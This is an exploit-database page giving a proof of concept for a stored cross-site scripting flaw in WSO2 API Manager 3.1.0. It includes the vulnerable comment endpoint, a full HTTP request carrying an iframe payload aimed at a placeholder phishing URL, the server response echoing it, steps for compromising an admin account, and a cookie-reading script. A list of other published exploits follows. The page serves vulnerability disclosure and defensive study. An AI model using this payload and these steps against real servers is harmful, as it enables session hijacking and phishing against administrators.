Search for hundreds of thousands of exploits

"WSO2 3.1.0 - Persistent Cross-Site Scripting"

Author

Exploit author

"Raki Ben Hamouda"

Platform

Exploit platform

java

Release date

Exploit published date

2020-04-14

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting
# Date: 2020-04-13
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Softwrare link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A
# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700

Technical Details & Description:
================================
A remote Stored Cross Site Scripting has been discovered in WSO2 API
Manager Ressource Browser component).
The security vulnerability allows a remote attacker With access to the
component "Ressource Browser"
to inject a malicious code in Add Comment Feature.

The vulnerability is triggered after sending a POST request to
`/carbon/info/comment-ajaxprocessor.jsp` with Parameter
"comment=targeted&path=%2F".
Remote attackers has the ablility to spread a malware,to Hijack a session
(a session with Higher privileges), or to initiate phishing attacks.

The security risk of the Stored XSS web vulnerability is estimated as
medium with a cvss (common vulnerability scoring system) count of 5.4
Exploitation of the Stored XSS web vulnerability requires a low privilege
web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in Compromising the
server .


Request Method:
[+] POST

Module:
[+] /carbon/info/comment-ajaxprocessor.jsp

Parameters:
[+] comment=admincomment
[+] path=%2F
=======================================

POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
Host: 192.168.149.1:9443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
Content-Length: 64
Cookie: region3_registry_menu=visible; region3_metadata_menu=none;
wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e;
JSESSIONID=4B3AB3AA8895F2897685FA98C327D521;
requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none;
region4_monitor_menu=none; region5_tools_menu=none;
current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
Connection: close

comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F





==============================



HTTP/1.1 200

X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
vary: accept-encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 31 Dec 2019 10:50:00 GMT
Connection: close
Server: WSO2 Carbon Server
Content-Length: 3144


//the body of response includes attacker malicious script


<a class="closeButton icon-link registryWriteOperation"
onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete"
style="background-image:
url(../admin/images/delete.gif);position:relative;float:right">&nbsp;</a>


 <iframe href=http://phishing_url>
 <br/>
posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker



Proof of Concept (PoC):
=======================

//Let's suppose we're Attacking an admin with higher privileges



1-Attacker opens his account

2-add arbitrary comment


3-intercepts the request


4-add malicious script to the comment


5-admin access his account,he wants to add a comment,the malicious script
got executed


===>Admin account compromised



===============================================================================



Example malicious script :


<script>
  alert(document.cookie);
</script>



===============================================================================
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-04-14"WSO2 3.1.0 - Persistent Cross-Site Scripting"webappsjava"Raki Ben Hamouda"
2020-04-13"WSO2 3.1.0 - Arbitrary File Delete"webappsjava"Raki Ben Hamouda"
2020-02-27"Comtrend VR-3033 - Command Injection"webappshardware"Raki Ben Hamouda"
2019-05-14"D-Link DWL-2600AP - Multiple OS Command Injection"webappshardware"Raki Ben Hamouda"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48319/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.